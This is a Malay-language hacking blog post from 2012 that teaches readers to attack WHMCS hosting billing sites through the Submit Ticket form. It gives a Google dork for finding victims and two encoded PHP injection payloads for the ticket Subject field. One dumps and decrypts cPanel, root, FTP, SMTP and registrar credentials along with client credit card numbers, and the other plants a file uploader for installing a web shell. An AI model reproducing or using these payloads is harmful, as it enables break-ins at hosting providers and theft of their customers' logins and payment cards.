Wednesday, 5 September 2012

WHMCS Submit Ticket Exploit - Get CPanel & Upload Shell


Assalamualaikum dan salam sejahtera, entry kali ini aku nak ajar korang exploit untuk hack WHMCS.Exploit ni kita boleh dapatkan username dan password CPanel website2 yang di-host di dalam WHMCS mangsa kita.Selain itu kita juga boleh upload shell :)

Jom Mula!


100% Credit DevilCafe & Hacking&Security.
aku cuma translate ja....

1. Cari website hosting dan cari perkataan "Submit Ticket".
Korang juga boleh guna google dork :
"Powered By WHMCompleteSolution" inurl:submitticket.php


2. Sekarang click "Submit Ticket" dan click bahagian "Sales Department".



3. Seterusnya kita perlu mengisi kotak2 kosong yang disediakan.
Isikan saja apa2 pun.
TETAPI!Yang penting adalah kotak Subject!
Kita perlu isikan kotak ini dengan code php.




Isikan kotak Subject tu dengan code ini :
{php}evaL(base64_decode('DQppbmNsdWRlKCdjb25maWd1cmF0aW9uLnBocCcpOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxzZXJ2ZXJzIik7DQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgSE9TVCBST09UUyAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokaXBhZGRyZXNzID0gJHZbJ2lwYWRkcmVzcyddOw0KJHVzZXJuYW1lID0gJHZbJ3VzZXJuYW1lJ107DQokdHlwZSA9ICR2Wyd0eXBlJ107DQokYWN0aXZlID0gJHZbJ2FjdGl2ZSddOw0KJGhvc3RuYW1lID0gJHZbJ2hvc3RuYW1lJ107DQoNCg0KJHBhc3N3b3JkID0gZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpOw0KDQokdGV4dD0kdGV4dC4iVHlwZSAkdHlwZVxyXG4iOw0KJHRleHQ9JHRleHQuIkFjdGl2ZSAkYWN0aXZlXHJcbiI7DQokdGV4dD0kdGV4dC4iSG9zdG5hbWUgJGhvc3RuYW1lXHJcbiI7DQokdGV4dD0kdGV4dC4iSXAgJGlwYWRkcmVzc1xyXG4iOw0KJHRleHQ9JHRleHQuIlVzZXJuYW1lICR1c2VybmFtZVxyXG4iOw0KJHRleHQ9JHRleHQuIlBhc3N3b3JkICRwYXNzd29yZFxyXG4qKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKlxyXG4iOw0KDQoNCn0NCiR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBIT1NUIFJPT1RTICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgRG9tYWluIFJlc2VsbGVyICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KDQokcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0YmxyZWdpc3RyYXJzIik7DQoNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KDQokcmVnaXN0cmFyIAk9ICR2WydyZWdpc3RyYXInXTsNCiRzZXR0aW5nID0gJHZbJ3NldHRpbmcnXTsNCiR2YWx1ZSA9IGRlY3J5cHQgKCR2Wyd2YWx1ZSddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCmlmICgkdmFsdWU9PSIiKSB7DQokdmFsdWU9MDsNCn0NCiRwYXNzd29yZCA9IGRlY3J5cHQgKCR2WydwYXNzd29yZCddLCAkY2NfZW5jcnlwdGlvbl9oYXNoKTsNCiR0ZXh0PSR0ZXh0LiIkcmVnaXN0cmFyICRzZXR0aW5nICR2YWx1ZVxyXG4iOw0KfQ0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIERvbWFpbiBSZXNlbGxlciAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCg0KJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIEZUUCArU01UUCAjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyNcclxuIjsNCgkkcXVlcnkgPSBteXNxbF9xdWVyeSgiU0VMRUNUICogRlJPTSB0Ymxjb25maWd1cmF0aW9uIHdoZXJlIHNldHRpbmc9J0ZUUEJhY2t1cEhvc3RuYW1lJyBvciBzZXR0aW5nPSdGVFBCYWNrdXBVc2VybmFtZScgb3IgIHNldHRpbmc9J0ZUUEJhY2t1cFBhc3N3b3JkJyBvciAgc2V0dGluZz0nRlRQQmFja3VwRGVzdGluYXRpb24nIG9yICBzZXR0aW5nPSdTTVRQSG9zdCcgb3IgIHNldHRpbmc9J1NNVFBVc2VybmFtZScgb3Igc2V0dGluZz0nU01UUFBhc3N3b3JkJyBvciAgc2V0dGluZz0nU01UUFBvcnQnIik7DQp3aGlsZSgkdiA9IG15c3FsX2ZldGNoX2FycmF5KCRxdWVyeSkpIHsNCiR2YWx1ZSA9JHZbJ3ZhbHVlJ107DQppZiAoJHZhbHVlPT0iIikgew0KJHZhbHVlPTA7DQp9DQoNCiR0ZXh0PSR0ZXh0LiR2WydzZXR0aW5nJ10uIiAiLiR2YWx1ZS4iXHJcbiIgOw0KCQ0KfQ0KCQ0KCQ0KCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBGVFAgK1NNVFAgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQoJDQoJCSR0ZXh0PSR0ZXh0LiJcclxuIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyBDbGllbnQgUjAwdHMgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSB1c2VybmFtZSA9ICdyb290JyBvciB1c2VybmFtZSA9ICdBZG1pbicgb3IgdXNlcm5hbWUgPSAnYWRtaW4nIG9yIHVzZXJuYW1lID0gJ0FkbWluaXN0cmF0b3InIG9yICB1c2VybmFtZSA9ICdhZG1pbmlzdHJhdG9yJyBvcmRlciBieSBkb21haW5zdGF0dXMiKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IFIwMHRzICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IEhPU1QgIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXHJcbiI7DQogJHF1ZXJ5ID0gbXlzcWxfcXVlcnkoIlNFTEVDVCAqIEZST00gdGJsaG9zdGluZyB3aGVyZSBkb21haW5zdGF0dXM9J0FjdGl2ZSciKTsNCg0KIA0KICAgIHdoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KCWlmICgoJHZbJ3VzZXJuYW1lJ10gKSBhbmQgKCR2WydwYXNzd29yZCddKSkgew0KICAgJHRleHQ9JHRleHQuIlxyXG5Eb21haW4gIi4kdlsnZG9tYWluJ10uIlxyXG5JUCAiLiR2WydkZWRpY2F0ZWRpcCddLiJcclxuVXNlcm5hbWUgIi4kdlsndXNlcm5hbWUnXS4iXHJcblBhc3N3b3JkICIuZGVjcnlwdCAoJHZbJ3Bhc3N3b3JkJ10sICRjY19lbmNyeXB0aW9uX2hhc2gpLiJcclxuRG9tYWluc3RhdHVzIi4kdlsnZG9tYWluc3RhdHVzJ10uIlxyXG4iOw0KICAgIH0NCgl9DQoJJHRleHQ9JHRleHQuIlxyXG4jIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIENsaWVudCBIT1NUICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCQ0KCQkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCSRxdWVyeSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIGB0YmxjbGllbnRzYCBXSEVSRSBjYXJkdHlwZSA8PiAnJyBvcmRlciBieSBpc3N1ZW51bWJlciBkZXNjIik7DQoNCgkNCndoaWxlKCR2ID0gbXlzcWxfZmV0Y2hfYXJyYXkoJHF1ZXJ5KSkgew0KJGNjaGFzaCA9IG1kNSggJGNjX2VuY3J5cHRpb25faGFzaC4kdlsnMCddKTsNCiRzPSAgbXlzcWxfcXVlcnkoInNlbGVjdCBjYXJkdHlwZSxBRVNfREVDUllQVChjYXJkbnVtLCd7JGNjaGFzaH0nKSBhcyBjYXJkbnVtLEFFU19ERUNSWVBUKGV4cGRhdGUsJ3skY2NoYXNofScpIGFzIGV4cGRhdGUsQUVTX0RFQ1JZUFQoaXNzdWVudW1iZXIsJ3skY2NoYXNofScpIGFzIGlzc3VlbnVtYmVyLEFFU19ERUNSWVBUKHN0YXJ0ZGF0ZSwneyRjY2hhc2h9JykgYXMgc3RhcnRkYXRlICBGUk9NIGB0YmxjbGllbnRzYCB3aGVyZSBpZD0nIi4kdlsnMCddLiInIiApOw0KDQokdjI9bXlzcWxfZmV0Y2hfYXJyYXkoJHMpOw0KDQogICR0ZXh0PSR0ZXh0LiJcclxuIi4kdjJbMF0uInwiLiR2MlsxXS4ifCIuJHYyWzJdLiJ8Ii4kdjJbM10uInwiLiR2Mls0XTsNCn0NCg0KDQogICANCiANCgkkdGV4dD0kdGV4dC4iXHJcbiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMgQ2xpZW50IENDICMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xyXG4iOw0KCQ0KCWVjaG8oJHRleHQpOw=='));exit;{/php}


Kemudian scroll turun bawah,isikan captcha dan click butang submit.



4. Seterusnya kita akan di-redirected ke page baru dimana akan terpapar username dan password cpanel!Tadaaa!!! korang dah dapat username dan password account2 cpanel yang di hostkan di dalam whmcs tu.
Kalau korang bernasib baik korang juga mungkin akan dapat password FTP dan SMTP!



5. Seterusnya!Tunggu...tak habis lagi.....kita ada lagi satu trick!
Trick ini adalah untuk mengupload SHELL!

Ok jom!

Kembali ke borang submit ticket tadi dan masukkan apa2 dalam kotak2 tu kecuali kotak SUBJECT.


Kita akan letakkan code php di dalam kotak subject dan jika berjaya,kita akan dapat uploader pada website tersebut dan dapat upload shell.
Step dia sama macam tadi dan yang penting sekali kotak SUBJECT.

6. Isikan kotak SUBJECT dengan code ini :

{php}eval(base64_decode('JGM9YmFzZTY0X2RlY29kZSgiUEQ5d2FIQU5DbWxtS0dsemMyVjBLQ1JmVUU5VFZGc25VM1ZpYldsMEoxMHBLWHNOQ2lBZ0lDQWtabWxzWldScGNpQTlJQ0lpT3lBTkNpQWdJQ0FrYldGNFptbHNaU0E5SUNjeU1EQXdNREF3SnpzTkNnMEtJQ0FnSUNSMWMyVnlabWxzWlY5dVlXMWxJRDBnSkY5R1NVeEZVMXNuYVcxaFoyVW5YVnNuYm1GdFpTZGRPdzBLSUNBZ0lDUjFjMlZ5Wm1sc1pWOTBiWEFnUFNBa1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkMGJYQmZibUZ0WlNkZE93MEtJQ0FnSUdsbUlDaHBjM05sZENna1gwWkpURVZUV3lkcGJXRm5aU2RkV3lkdVlXMWxKMTBwS1NCN0RRb2dJQ0FnSUNBZ0lDUmhZbTlrSUQwZ0pHWnBiR1ZrYVhJdUpIVnpaWEptYVd4bFgyNWhiV1U3RFFvZ0lDQWdJQ0FnSUVCdGIzWmxYM1Z3Ykc5aFpHVmtYMlpwYkdVb0pIVnpaWEptYVd4bFgzUnRjQ3dnSkdGaWIyUXBPdzBLSUNBTkNtVmphRzhpUEdObGJuUmxjajQ4WWo1RWIyNWxJRDA5UGlBa2RYTmxjbVpwYkdWZmJtRnRaVHd2WWo0OEwyTmxiblJsY2o0aU93MEtmUTBLZlEwS1pXeHpaWHNOQ21WamFHOG5EUW84Wm05eWJTQnRaWFJvYjJROUlsQlBVMVFpSUdGamRHbHZiajBpSWlCbGJtTjBlWEJsUFNKdGRXeDBhWEJoY25RdlptOXliUzFrWVhSaElqNDhhVzV3ZFhRZ2RIbHdaVDBpWm1sc1pTSWdibUZ0WlQwaWFXMWhaMlVpUGp4cGJuQjFkQ0IwZVhCbFBTSlRkV0p0YVhRaUlHNWhiV1U5SWxOMVltMXBkQ0lnZG1Gc2RXVTlJbE4xWW0xcGRDSStQQzltYjNKdFBpYzdEUXA5RFFvL1BpQT0iKTsNCiRmaWNoaWVyID0gZm9wZW4oJ2Rvd25sb2Fkcy9pbmRleHgucGhwJywndycpOw0KZndyaXRlKCRmaWNoaWVyLCAkYyk7DQpmY2xvc2UoJGZpY2hpZXIpOw=='));exit;{/php}

Selepas isi semua dan captcha,click submit.Seterusnya kita akan ubah url untuk cari uploader itu.

Caranya :
http://www.website.com/client/submitticket.php

Gantikan submitticket.php dengan :
/downloads/indexx.php

Url dia akan jadi macam ni :
http://www.website.com/client/downloads/indexx.php

Buka link tu dan korang akan nampak uploader!
Sekarang upload lah shell korang!




Untuk tengok hasil :
http://www.website.com/client/downloads/shell_name.php


Baiklah sampai sini saja untuk entry kali ini.Semoga korang berjaya :D

tag - whmcs hacked , hosting digodam , hacked , whmcs.com hacked , cara untuk godam komputer , cara cara godam komputer , menggodam
Item Reviewed: WHMCS Submit Ticket Exploit - Get CPanel & Upload Shell Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com